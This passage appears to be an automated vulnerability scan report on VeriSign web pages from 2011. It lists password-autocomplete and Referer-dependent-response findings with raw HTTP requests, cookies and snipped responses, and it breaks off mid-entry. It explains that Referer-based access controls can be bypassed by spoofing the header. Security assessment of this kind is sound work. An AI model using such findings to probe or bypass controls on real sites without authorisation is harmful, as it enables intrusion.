GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/ssl/buy-ssl-certificates/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.40. http://www.verisign.com/trust-seal/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/trust-seal/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.41. http://www.verisign.com/verisign-worldwide/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/verisign-worldwide/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.42. https://www.verisign.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.43. https://www.verisign.com/products-services/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products-services/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
12. Referer-dependent response
previous
next
There are 7 instances of this issue:
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present. Common explanations for Referer-dependent responses include:Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing. If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/arrow_red.png
Request 1
GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/arrow_white.png
Request 1
GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/nav_grad.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:17 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:17 2011<br /> Apache</span> </address> </body> </html>
12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-aliveReferer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
